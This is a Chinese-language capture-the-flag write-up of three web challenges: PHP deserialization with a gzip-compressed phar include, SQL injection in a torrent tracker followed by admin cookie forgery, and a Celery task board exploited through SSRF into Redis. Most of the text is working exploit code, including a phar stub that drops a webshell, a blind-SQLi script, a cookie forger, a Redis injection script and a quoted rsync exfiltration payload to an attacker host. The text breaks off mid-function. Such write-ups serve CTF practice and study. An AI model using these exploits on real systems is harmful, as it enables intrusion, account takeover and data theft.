$GLOBALS['filename'] = $this->readflag;
if ($this->key == 'class') {
new $func();
} else if ($this->key == 'func') {
$func();
} else {
highlight_file('index.php');
}
}
}

$ser = isset($_GET['land']) ? $_GET['land'] : 'O:4:"test":N';
@unserialize($ser);

正常走destruct看phpinfo可以发现php版本为7.4.33

1
O:4:"test":2:{s:1:"f";s:7:"phpinfo";s:3:"key";s:4:"func";}

观察源代码 我们思路就是:

  • 传个文件
  • 调用到匿名类的readflag 使readflag被声明
  • 直接调用readflag
  • 文件包含

匿名类遵循这样的规则:

1
class@anonymous + %00 + 路径 + : + 行号 + $ + 序号

但是这里是eval里注册的,我们起一个示例看看。可以通过 get_class() 的方式查看匿名类的序列化情况

1
2
3
4
5
<?php
eval('$b = new class{};');
echo get_class($b);
echo '<br>';
echo urlencode(get_class($b));
1
2
class@anonymousD:\phpstudy_pro\test\testtest.php(2) : eval()'d code:1$5
class%40anonymous%00D%3A%5Cphpstudy_pro%5Ctest%5Ctesttest.php%282%29+%3A+eval%28%29%27d+code%3A1%245

因此eval中的匿名类类名的规则是

1
class@anonymous + %00 + 路径 + (eval 所在的行号) + " : eval()'d code:" + eval 代码中定义匿名类的行号 + $ + 匿名类序号

所以我们可以这样调用到 readflag

1
2
3
4
5
6
7
8
9
10
$test1 = new test();
$test1->key = "func";
$test1->f = ["class@anonymous\00/var/www/html/index.php(1) : eval()'d code:1$0", 'readflag'];

$test2 = new test();
$test2 -> key = "func";
$test2 -> f = "readflag";

$payload = [$test1, $test2];
echo urlencode(serialize($payload));

这里 ["class@anonymous\00/var/www/html/index.php(1) : eval()'d code:1$0", 'readflag']是一个 PHP 回调数组 ["类名字符串", "方法名"],等价于 "类名字符串"::方法名();

也就是说,在 $test1 析构时

1
2
$func = $this->f;            // ["class@anonymous\00...$0", "readflag"]
$func(); // 等价于 class@anonymous\00...$0::readflag();

从而成功调用匿名类的方法 readflag(),这样方法 readflag() 内层的 function readflag(){...} 才会在全局被注册。

在 PHP 里,“在函数/方法里面写的 function xxx(){} 其实还是在定义一个全局函数,只是定义这件事要等执行到那一行才发生”。

能调用readflag后,肯定要去用上这个文件包含,但是这里有不少过滤

1
preg_match('/<\?|\:\/\/|ph|\?\=/i', $file_content)

其实这个考点前一段时间热度挺高,参考这个博客https://fushuling.com/index.php/2025/07/30/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web/

我们可以上传一个用gzip压缩过的phar文件,最后只要文件名中有.phar,即可在被文件包含后默认把这个gz文件解压回phar进行解析。

我们可以这样构造 phar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
// Builds exploit.phar, whose stub drops a one-line webshell (1.php) when the archive is
// include()d, and then writes a gzip-compressed copy (phpinfo.phar.gz) that is checked
// locally against the target's content filter.
//
// Creating a Phar needs phar.readonly to be off, e.g.:
//   php -d phar.readonly=0 build_phar.php

if (filter_var(ini_get('phar.readonly'), FILTER_VALIDATE_BOOLEAN)) {
    fwrite(STDERR, "phar.readonly is enabled; re-run with: php -d phar.readonly=0\n");
    exit(1);
}

// Start from a clean archive so a stale file from an earlier run is not reused.
@unlink('exploit.phar');

$phar = new Phar('exploit.phar');
$phar->startBuffering();

$stub = <<<'STUB'
<?php
system('echo "<?php system(\$_GET[1]); ?>" > 1.php');
__HALT_COMPILER();
?>
STUB;

$phar->setStub($stub);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();
unset($phar);

// gzencode() emits a gzip stream without the original file name in its header, so the
// string "exploit.phar" never appears in the output and no hex editing is needed.
$raw = file_get_contents('exploit.phar');
$waf = '/<\?|\:\/\/|ph|\?\=/i'; // same pattern the target applies to the uploaded content
$gz = null;
for ($level = 9; $level >= 1; $level--) {
    $candidate = gzencode($raw, $level);
    if (!preg_match($waf, $candidate)) {
        $gz = $candidate;
        break;
    }
}

if ($gz === null) {
    // Compressed bytes can match the filter by coincidence; changing the archive content
    // (for example the text stored in test.txt) yields a different stream.
    fwrite(STDERR, "every compression level still matches the filter; alter the archive content and retry\n");
    exit(1);
}

file_put_contents('phpinfo.phar.gz', $gz);
echo "written phpinfo.phar.gz (" . strlen($gz) . " bytes)\n";

?>

随后gzip压缩一下就可以,不过由于gzip压缩后文件名exploit.phar会留在文件的字符串里,还是会被waf检测到有ph,解决方法是用010editor直接把ph里面的一个字母改成别的字母就好了(也可以在压缩时用 gzip -n,这样头部不会写入原始文件名)

那么最后的问题是如何构造这样的文件名,看一下文件名怎么生成的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
function generateRandomString($length = 8){
$characters = 'abcdefghijklmnopqrstuvwxyz';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$r = rand(0, strlen($characters) - 1);
$randomString .= $characters[$r];
}
return $randomString;
}

$time = date('Hi');
$filename = $GLOBALS['filename'];
$seed = $time . intval($filename);
mt_srand($seed);
$randomStr = generateRandomString(8);
$newFilename = $time . '.' . $randomStr . '.' . 'jpg';

本地测试一下知道$time在一分钟内值是不会变的,filename又是我们可控,相当于任意一分钟内$seed也是我们可控的。那么我们只需要选定一个时间,提前爆破好能使$randomStr以phar开头的$filename即可。

完整exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<?php
/**
 * Exploit driver for the ezphp challenge.
 *
 * 1. Brute-forces the integer that, appended to the current HHMM, seeds the generator so
 *    the target's stored file name starts with "phar".
 * 2. Builds a serialized array of three `test` objects: upload, declare readflag(), include.
 * 3. Sends the payload together with the gzip-compressed phar.
 *
 * The whole run has to finish inside the minute in which $time was taken.
 */

/** Mirror of the target's generateRandomString(): $length letters from a-z via rand(). */
function generateRandomString($length = 8) {
    $characters = 'abcdefghijklmnopqrstuvwxyz';
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $r = rand(0, strlen($characters) - 1);
        $randomString .= $characters[$r];
    }
    return $randomString;
}

date_default_timezone_set('Asia/Shanghai');
$time = date('Hi'); // the target seeds with its current HHMM, so the request must land in this minute

// Brute-force the value that ends up in $GLOBALS['filename'] on the target.
for ($filename = 1; $filename <= 999999999999999999; $filename++) {
    $seed = $time . intval($filename);
    mt_srand($seed); // same seeding call as the target
    $randomStr = generateRandomString(8);

    // Only the hit is printed: per-iteration output slows a search that is time-boxed.
    if (strpos($randomStr, 'phar') === 0) {
        $newFilename = $time . '.' . $randomStr . '.' . 'jpg';
        echo $time . "---" . $seed . "---" . $filename . "---" . $newFilename . "\n\n\n";
        echo "Found 'phar' in filename! Stopping.\n";
        break;
    }
}


class test {
    public $readflag;
    public $f;
    public $key;

    // Empty on purpose: the local class must not run the target's constructor logic.
    public function __construct()
    {
    }

}

// Object 1: `new test()` on the target runs the upload constructor with our seed value.
$o1 = new test();
$o1->f = 'test';
$o1->key = 'class';
echo "---------------" . $filename . "------------";
$o1->readflag = $filename;

// Object 2: call the anonymous class's readflag() method so the inner function gets declared.
$o2 = new test();
$o2->f = ["class@anonymous\0/var/www/html/index.php(1) : eval()'d code:1$0", 'readflag'];
$o2->key = 'func';

// Object 3: call the now-declared readflag() function, which includes the uploaded file.
$o3 = new test();
$o3->f = 'readflag';
$o3->key = 'func';

$arr = [$o1, $o2, $o3];
$ser = serialize($arr);
echo urlencode($ser);

/** POSTs the gzip'd phar as form field "file" with the payload in the `land` query parameter. */
function sendrequest($url, $payload)
{
    $ch = curl_init();

    // Upload the prepared malicious gzip file.
    $postData = [
        'file' => new CURLFile('./phpinfo.phar.gz', 'application/gzip', 'file.txt')
    ];

    curl_setopt_array($ch, [
        CURLOPT_URL => $url . '?land=' . $payload,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $postData,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_TIMEOUT => 30,
    ]);

    $response = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);

    if ($error) {
        echo "cURL Error: " . $error;
    } else {
        echo $response;
    }
}

// The seed was computed for $time; if the minute has changed the name will not match.
if (date('Hi') !== $time) {
    fwrite(STDERR, "\nminute rolled over during the brute force; run the script again\n");
    exit(1);
}

$url = ""; // target base URL, e.g. http://host/index.php
sendrequest($url, urlencode($ser));

?>

PTer

https://mp.weixin.qq.com/s/4Fo5sZdRJP5J0aLemoz2EA
题目给出了用户qwb和密码,我们可以登录进系统中。

在announce.php中发现一处SQL注入,首先是一些参数检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// get string type passkey, info_hash, peer_id, event, ip from client
foreach (array("passkey","info_hash","peer_id","event") as $x)
{
if(isset($_GET[$x]))
$GLOBALS[$x] = $_GET[$x];
}
// get integer type port, downloaded, uploaded, left from client
foreach (array("port","downloaded","uploaded","left","compact","no_peer_id") as $x)
{
$GLOBALS[$x] = intval($_GET[$x] ?? 0);
}
//check info_hash, peer_id and passkey
foreach (array("info_hash","peer_id","port","downloaded","uploaded","left") as $x)
if (!isset($GLOBALS[$x])) warn("Missing key: $x");
foreach (array("info_hash","peer_id") as $x)
if (strlen($GLOBALS[$x]) != 20) warn("Invalid $x (" . strlen($GLOBALS[$x]) . " - " . rawurlencode($GLOBALS[$x]) . ")");
if (isset($passkey) && strlen($passkey) != 32) warn("Invalid passkey (" . strlen($passkey) . " - $passkey)");

主要满足:

1
array("passkey","info_hash","peer_id","event")

1
array("info_hash","peer_id","port","downloaded","uploaded","left")

里面的所有参数传入,并且info_hash和passkey必须正确,info_hash是已经在平台上存在的种子hash,在详情页面可以看到,passkey则是用户控制面板的密钥。

漏洞点在413行,明显存在SQL注入

1
$sameIPRecord = mysql_fetch_assoc(sql_query("select id from peers where torrent = $torrentid and userid = $userid and ip = '$ip' limit 1"));

追溯一下获取$ip的地方

1
2
3
4
5
//4. GET IP AND CHECK PORT
$ip = getip(); // avoid to get the spoof ip from some agent
$_GET['ip'] = $ip;
if (!$port || $port > 0xffff)
warn("invalid port");
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// Returns the client IP as a string.
// Source priority: X-Forwarded-For header, then Client-IP header (each only when
// validip() accepts it), then REMOTE_ADDR. validip() is defined elsewhere and is not
// visible here. With $real = true, only the part before the first comma is returned.
function getip($real = true) {
if (isset($_SERVER)) {
// Both header values below are supplied by the client.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && validip($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_CLIENT_IP']) && validip($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} else {
$ip = $_SERVER['REMOTE_ADDR'] ?? '';
}
} else {
// Same lookup order through getenv() when $_SERVER is not set.
if (getenv('HTTP_X_FORWARDED_FOR') && validip(getenv('HTTP_X_FORWARDED_FOR'))) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('HTTP_CLIENT_IP') && validip(getenv('HTTP_CLIENT_IP'))) {
$ip = getenv('HTTP_CLIENT_IP');
} else {
$ip = getenv('REMOTE_ADDR') ?? '';
}
}
// Strip surrounding whitespace, then leading/trailing commas.
$ip = trim(trim($ip), ",");
if ($real && str_contains($ip, ",")) {
return strstr($ip, ",", true);
}
return $ip;
}

明显是可以通过XFF伪造的,因此可以构造exp进行注入,要注意的是会判断Host是否包含在$trackerUrl,所以要改一下host,平台上是pter.qwb.local

1
2
3
4
5
$currentUrl = getSchemeAndHttpHost();
if (!str_contains($trackerUrl, $currentUrl)) {
do_log("announce check tracker url, trackerUrl: $trackerUrl does not contains: $currentUrl");
warn("you should announce to: $trackerUrl");
}

盲注获取auth_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from time import sleep
import requests

passkey = "0ef547977bb67b8fdf34dbba8ac28efa"
session = "eyJpdiI6IktZcWF2WktzYmNhaXB3OE56Vzg2MWc9PSIsInZhbHVlIjoiWjZ0N3JSRnN4VGJJVEZHVnk2bnV6MmdlOXhpdXFwWlpaanhzUmJLU0lzMnVHSmsrOWlSNyswVFI1dmtNWWdDWHUydElrRHZkVWluODBlQmNmTGlBMEhGd2hUeXpLdS9ETnFFM3Y5dDBDa29DRVdzaEJFTGlpdHB6ZjlWVlhITUMiLCJtYWMiOiJlYjM4MWU3NTc2MTZiY2Y2NGZkNmQ2ZmYyYjQ0ZjQ3ZWI4NjgxMmU1NWE3NzcyYTBhZTA4ZWQ5ODA2NzZjM2IzIiwidGFnIjoiIn0="
url = "http://xxx/"
sess = requests.Session()
sess.cookies.set("c_secure_pass", session)

def announce(data):
    """Send one announce request with ``data`` injected through X-Forwarded-For.

    ``data`` is a sub-query placed inside ``exp(710-( ... ))``. The caller treats an
    HTTP 200 response as "condition true" and anything else as "condition false"
    (presumably because ``exp(710)`` overflows in MySQL while ``exp(710 - length)``
    does not).
    """
    sleep(5)  # pause between announces
    u = url + "announce.php"
    payload = f"' or exp(710-( {data} )) and '"
    r = sess.post(
        u,
        params={
            "info_hash": bytes.fromhex("2cefbfbd6a5f5227efbfbdefbfbd6befbfbd4aef"),
            "peer_id": bytes.fromhex("2cefbfbd6a5f5227efbfbdefbfbd6befbfbd4aef"),
            "port": "80",
            "downloaded": "1",
            "uploaded": "1",
            "left": "1",
            "passkey": passkey,
            "event": "stopped",
        },
        headers={"User-Agent": "uTorrent/3000", "X-FORWARDED-FOR": payload, "Host": "pter.qwb.local"},
    )
    return r.status_code == 200


def sqli1(max_len=64):
    """Recover ``auth_key`` of user id 1 one hex character at a time and return it.

    The search stops when no candidate character extends the known prefix, i.e. the
    key is complete, instead of after a fixed number of characters. ``max_len`` is
    only a safety bound against an oracle that always answers "true".
    """
    ans = ""
    chars = '1234567890abcdef'
    while len(ans) < max_len:
        for char in chars:
            payload = f"select length(auth_key) from users where auth_key like '{ans}{char}%' and id=1 union select 0 limit 1"
            if announce(payload):
                ans += char
                print(ans)
                break
        else:
            # No character matched: the whole key has been recovered.
            break
    return ans


if __name__ == "__main__":
    sqli1()

app/Auth/NexusWebUserProvider.php->validateCredentials中有如下验证cookie代码:

1
2
3
4
5
6
/**
 * Verify the signature of the "c_secure_pass" cookie against the user's auth_key.
 *
 * The cookie value is base64-decoded and split on "." into a token JSON
 * string and a signature. The expected signature is the HMAC-SHA256 of the
 * token JSON keyed with $user->auth_key. Only the signature is checked here;
 * the token's contents are not inspected in this method.
 *
 * @param Authenticatable $user        user whose auth_key is the HMAC key
 * @param array           $credentials must contain the "c_secure_pass" entry
 * @return bool true when the supplied signature equals the expected one
 */
public function validateCredentials(Authenticatable $user, array $credentials)
{
// explode() splits on every "."; list() keeps only the first two pieces.
list($tokenJson, $signature) = explode('.', base64_decode($credentials["c_secure_pass"]));
// The HMAC key is the per-user auth_key, so knowing it is enough to sign any token.
$expectedSignature = hash_hmac('sha256', $tokenJson, $user->auth_key);
// hash_equals() compares in constant time.
return hash_equals($expectedSignature, $signature);
}

因此获取到admin的auth_key之后可以进行伪造

1
2
3
4
5
<?php
// Token body: JSON with the target user id and an "expires" value
// (presumably a Unix timestamp -- confirm against the application).
$data = json_encode(array("user_id" => "1","expires" => 1992307586));

// Sign the JSON with HMAC-SHA256, using the leaked auth_key as the key.
$s = hash_hmac('sha256', $data, "73ec97f74152abca89d44ec21be2e46b54b86947");
// Cookie value format: base64(<json> . "." . <hex signature>).
echo base64_encode($data . "." . $s);

尝试登录成功,管理员的站点设置中可以允许上传php,但是题目中貌似把public下的写权限全部去除了
alt text

因此找到另一处文件包含点public/page.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
// Entry script: resolves the "view" request parameter to a PHP file and executes it.
require "../include/bittorrent.php";

if (!empty($_REQUEST['view'])) {
// Strip leading/trailing "/" and "." characters, then turn every remaining "." into "/".
$view = trim($_REQUEST['view'], "/.");
$view = str_replace(".", "/", $view);
if (!empty($_REQUEST['plugin'])) {
// Plugin views: the plugin object decides where the view file lives.
$pluginId = $_REQUEST['plugin'];
$plugin = \Nexus\Plugin\Plugin::getById($pluginId);
$viewFile = $plugin->getNexusView($view);
} else {
// Default: look the view up under resources/views.
$viewFile = ROOT_PATH . "resources/views/$view";
}

// The ".php" suffix is appended when it is missing.
if (!str_ends_with($viewFile, ".php")) {
$viewFile .= ".php";
}
if (file_exists($viewFile)) {
// Any existing file at the resolved path is executed as PHP.
require $viewFile;
} else {
// Missing view: log the resolved path and the whole request, then fail.
$msg = "viewFile: $viewFile not exists, _REQUEST: " . json_encode($_REQUEST);
do_log($msg, "error");
throw new \RuntimeException($msg);
}
} else {
// No "view" parameter supplied.
$msg = "require view parameter, _REQUEST: " . json_encode($_REQUEST);
do_log($msg, "error");
throw new \RuntimeException($msg);
}

直接把附件目录改到该目录下
alt text

然后到任意一处编辑框进行文件上传
alt text

通过文件包含点爆破即可,文件名格式: [日期(精确到秒)][文件md5].php
alt text

日志系统

https://mp.weixin.qq.com/s/oHrFdG0vvHKNlWguUWVXAA

anime

https://psdat123.github.io/posts/HCMUS-CTF-2025/

CeleRace

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
from __future__ import annotations

import mimetypes
from pathlib import Path

from framework import MiniFlask, jsonify, request, session, save_session

from . import auth
from .tasks import celery_app

STATIC_DIR = (Path(__file__).resolve().parent.parent / "static").resolve()

app = MiniFlask(__name__)


def require_login(next_handler):
def wrapper(**kwargs):
if not session.get("user"):
return jsonify({"error": "login required"}, status=403)
return next_handler(**kwargs)

return wrapper


def require_admin(next_handler):
def wrapper(**kwargs):
if session.get("role") != "admin":
return jsonify({"error": "admin only"}, status=403)
return next_handler(**kwargs)

return wrapper


@app.before_request
def load_user() -> None:
username = session.get("user")
if username:
request.user = username
request.role = session.get("role", "user")
else:
request.user = "guest"
request.role = "guest"


@app.after_request
def ensure_cookie(response):
response.headers.setdefault("X-App", "MiniWSGI")
return response

def _static_response(path: Path):
from werkzeug.exceptions import NotFound

if not path.exists() or not path.is_file():
raise NotFound()
mimetype, _ = mimetypes.guess_type(str(path))
with path.open("rb") as fh:
data = fh.read()
return app.response_class(data, mimetype=mimetype or "application/octet-stream")


@app.get("/")
def frontend():
return _static_response(STATIC_DIR / "index.html")


@app.get("/static/app.js")
def static_app_js():
return _static_response(STATIC_DIR / "app.js")


@app.get("/static/style.css")
def static_style_css():
return _static_response(STATIC_DIR / "style.css")


@app.get("/api/info")
def api_info():
return jsonify({"message": "MiniWSGI Task Board", "user": request.user})


@app.post("/register")
def register():
data = request.get_json(silent=True) or {}
try:
auth.register(data.get("username", ""), data.get("password", ""))
save_session()
except auth.AuthError as exc:
return jsonify({"error": str(exc)}), 400
return jsonify({"message": "registered", "user": auth.current_user()})


@app.post("/login")
def login():
data = request.get_json(silent=True) or {}
try:
auth.authenticate(data.get("username", ""), data.get("password", ""))
save_session()
except auth.AuthError as exc:
return jsonify({"error": str(exc)}), 401
return jsonify({"message": "logged in", "user": auth.current_user()})


@app.post("/logout")
def logout():
auth.logout()
save_session()
return jsonify({"message": "logged out"})


@app.get("/session")
def session_info():
return jsonify({"user": session.get("user", "guest"), "role": session.get("role", "guest")})


def _queue(task_name: str, **kwargs):
result = celery_app.send_task(task_name, kwargs=kwargs)
return jsonify({"task_id": result.id, "task": task_name})


@app.post("/tasks/echo")
def queue_echo():
data = request.get_json(silent=True) or {}
message = data.get("message", "")
return _queue("miniws.echo", message=message)


@app.post("/tasks/fetch", middlewares=[require_admin])
def queue_fetch_root():
return queue_fetch("")


@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
payload = request.get_json(silent=True) or {}
url = payload.get("url") or target
verb = payload.get("verb", "GET")
if not url:
return jsonify({"error": "url required"}, status=400)
host_header = payload.get("host")
body = payload.get("body")
return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)



@app.get("/tasks/result")
def task_result():
task_id = request.args.get("id")
if not task_id:
return jsonify({"error": "task id required"}, status=400)
result = celery_app.AsyncResult(task_id)
if not result.ready():
return jsonify({"state": result.state})
return jsonify({"state": result.state, "result": result.result})


if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)

漏洞点在于以下这个路由可以SSRF,但是有一个鉴权中间件

1
2
3
4
5
6
7
8
9
10
# Queue a "miniws.fetch" task. The route is guarded only by the require_admin middleware.
@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
# A missing or non-JSON body is treated as an empty dict.
payload = request.get_json(silent=True) or {}
# "url" from the JSON body takes precedence over the path segment.
url = payload.get("url") or target
verb = payload.get("verb", "GET")
if not url:
return jsonify({"error": "url required"}, status=400)
host_header = payload.get("host")
body = payload.get("body")
# url, host, body and verb are handed to the task as received; nothing is validated here.
return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)

auth.py里面可以看到正常注册的用户都是user身份,所以要想办法绕过这个中间件鉴权。

整个flask应用实际来源于一个MiniFlask类,在framework/app.py中定义

1
app = MiniFlask(__name__)

绕过 require_admin 中间件后,就可以直接请求 queue_fetch 接口。
tasks.py里可以看到miniws.fetch这个任务实际上就是自定义了一个请求包然后发送

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Celery task "miniws.fetch": hand-builds an HTTP/1.1 request, sends it over a
# plain TCP socket and returns the first 2048 bytes of whatever comes back.
@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
parsed = urlparse(url)
# When the URL has no hostname, the connection goes to settings.redis_host.
host = parsed.hostname or settings.redis_host
# The scheme only selects the default port; the socket below is always plain TCP.
port = parsed.port or (443 if parsed.scheme == "https" else 80)
path = parsed.path or "/"
if parsed.query:
path = f"{path}?{parsed.query}"

request_host = host_header or parsed.netloc or f"{host}:{port}"
request_body = body.encode() if body else b""

# NOTE(review): verb, path and request_host are interpolated as-is. Nothing
# strips CR/LF, so a caller-supplied verb can put arbitrary lines at the very
# start of the bytes sent to the peer.
payload = (
f"{verb} {path} HTTP/1.1\r\n"
f"Host: {request_host}\r\n"
"User-Agent: MiniFetch/1.0\r\n"
"Connection: close\r\n"
"\r\n"
).encode() + request_body

chunks: list[bytes] = []
with socket.create_connection((host, port), timeout=5) as sock:
sock.sendall(payload)
# Read until the peer closes the connection.
while True:
data = sock.recv(4096)
if not data:
break
chunks.append(data)
# "bytes" reports the length of the truncated preview, not of the full response.
preview = b"".join(chunks)[:2048]
return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

fetch_task 直接将用户输入(verb、url、host 等)未经任何过滤地拼接进了原始 HTTP 请求报文中,并且 verb 位于请求行的最前面。只需将 url 设置为 http://127.0.0.1:6379,通过控制 verb 即可与本机 Redis 服务交互,例如设置 verb 为 info\r\nquit\r\n。由于 Redis 存在未授权访问,可读取或修改 Redis 内数据,理论上可以随意创建 Celery 消息,也可以伪造任务的执行结果。
redis.acl

1
user default on nopass ~* &* +@all -SAVE -SLAVEOF -MODULE -CONFIG -MONITOR -CLIENT

redis_ssrf.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import time
import requests

TARGET = "http://localhost:5001"

def api_post(path: str, json_body: dict, cookies: dict | None = None) -> dict:
r = requests.post(
f"{TARGET}{path}", json=json_body, cookies=cookies or {}, timeout=5
)
r.raise_for_status()
return r.json()


def api_get(path: str, cookies: dict | None = None) -> dict:
r = requests.get(f"{TARGET}{path}", cookies=cookies or {}, timeout=5)
r.raise_for_status()
return r.json()


def queue_fetch_via_bypass(
    url: str, host: str | None = None, body: str | None = None, verb: str = "POST"
) -> str:
    """Queue a fetch task through the bypass path and wait for its preview.

    Posts the task description to the fetch endpoint, then polls the result
    endpoint up to 30 times, 0.2 s apart. Returns the ``preview`` field of the
    first ``SUCCESS`` result.

    :raises RuntimeError: when the task has not succeeded after all polls.
    """
    bypass_path = "/tasks/fetch/%252e%252e/%252e%252e/x"

    # Optional fields are only sent when the caller supplied them.
    payload = {"url": url, "verb": verb}
    optional_fields = (("host", host), ("body", body))
    payload.update({key: value for key, value in optional_fields if value is not None})

    task_id = api_post(bypass_path, payload)["task_id"]

    attempts_left = 30
    while attempts_left > 0:
        attempts_left -= 1
        res = api_get(f"/tasks/result?id={task_id}")
        print(res)
        if res.get("state") != "SUCCESS":
            time.sleep(0.2)
            continue
        preview = res.get("result", {}).get("preview", "")
        print("[+] fetch preview bytes:", res.get("result", {}).get("bytes"))
        return preview

    raise RuntimeError("fetch task timeout")

queue_fetch_via_bypass(
"http://127.0.0.1:6379/",
"127.0.0.1",
"",
"info\r\nquit\r\n",
)

搜索 Celery 历史漏洞,发现 CVE-2021-23727,虽然当前版本已经修复,但修复方式只是要求 exc_type 指向的对象必须是一个异常类(BaseException 的子类)。正好发现 framework.app 里面有一个奇怪的 DiagnosticsPersistError,其他地方根本没有使用到,在 /tmp/debug 存在的情况下实例化该对象就可以往任意路径写入文件。

1
当任务失败时,失败信息会在结果后端中进行序列化。在某些情况下,异常类只能从消费者(consumer)的代码库中导入。这种情况下,我们会重建异常类,以便在查询任务结果的进程中重新抛出错误。这一机制在 #4836 中引入。如果重建出来的异常类型并不是异常类,就会产生安全问题。如果没有本补丁中加入的检查,攻击者只要在结果后端把任务结果设置为失败,并把 os 模块的 system 函数作为异常类型、把 payload rsync /data attacker@192.168.56.100:~/data 作为异常参数,就可以注入远程代码执行指令,例如:{ "exc_module": "os", "exc_type": "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" }。根据我的分析,这个漏洞只有在以下条件同时满足时才可能被利用:生产者提交了一个延迟执行的任务,该任务运行时间足够长,使攻击者能够在执行过程中篡改结果,并且生产者轮询了该任务的结果;此外,攻击者还必须获得结果后端的访问权限。该安全漏洞的严重性较低,但我们仍建议进行升级。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
class DiagnosticsPersistError(RuntimeError):
    """Dormant exception used for development-time diagnostics persistence.

    When the sentinel file ``_DEBUG_SENTINEL`` exists, constructing the
    exception decodes ``payload`` (JSON, or hex-encoded JSON) and writes the
    described content to the described path. The exception message is always
    ``"diagnostics capture failed"``.

    Recognised payload keys: ``path`` (required), ``content``, ``mode``
    (default ``"w"``) and ``encoding`` (default ``"utf-8"``; ``"base64"`` means
    ``content`` is base64-encoded).

    Persistence is best-effort: a malformed payload or a failed write never
    prevents the exception object from being created.
    """

    _BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
    _DEBUG_SENTINEL = Path("/tmp/debug")

    def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
        if self._DEBUG_SENTINEL.exists():
            self._maybe_persist(payload)
        super().__init__("diagnostics capture failed", *args, **kwargs)

    def _maybe_persist(self, payload: str) -> None:
        """Write the content described by ``payload`` to disk; ignore failures."""
        info = self._decode_payload(payload)
        if not info:
            return

        target = info.get("path")
        # A non-string path (e.g. a JSON number) used to raise TypeError from
        # Path() outside the try block and abort construction.
        if not target or not isinstance(target, str):
            return

        # NOTE(review): the target path is used as given and is not confined to
        # _BASE_DIR, so the payload can name any writable location.
        path = Path(target)
        mode = str(info.get("mode", "w"))
        encoding = info.get("encoding", "utf-8")
        data = info.get("content", "")

        try:
            path.parent.mkdir(parents=True, exist_ok=True)
            if "b" in mode:
                blob = self._ensure_bytes(data, encoding)
                with path.open(mode) as fh:  # type: ignore[call-arg]
                    fh.write(blob)
            else:
                text = self._ensure_text(data, encoding)
                # "base64" describes how the content is transported; it is not
                # a text encoding that open() accepts, so write as UTF-8.
                file_encoding = "utf-8" if encoding == "base64" else encoding
                with path.open(mode, encoding=file_encoding) as fh:
                    fh.write(text)
        except Exception:
            # Best-effort by design: a failed write must not mask the error.
            return

    def _decode_payload(self, payload: str) -> Dict[str, Any] | None:
        """Return the payload as a dict, trying raw JSON and then hex-encoded JSON.

        Returns None when no candidate parses to a JSON object.
        """
        attempts = [payload]
        try:
            attempts.append(bytes.fromhex(payload).decode("utf-8"))
        except Exception:
            pass

        for candidate in attempts:
            try:
                decoded = json.loads(candidate)
            except Exception:
                continue
            # Valid JSON that is not an object (number, list, string, ...)
            # cannot describe a write; callers rely on dict methods.
            if isinstance(decoded, dict):
                return decoded
        return None

    def _ensure_bytes(self, data: Any, encoding: str) -> bytes:
        """Convert ``data`` to bytes, base64-decoding strings when requested."""
        if isinstance(data, bytes):
            return data
        if isinstance(data, str):
            if encoding == "base64":
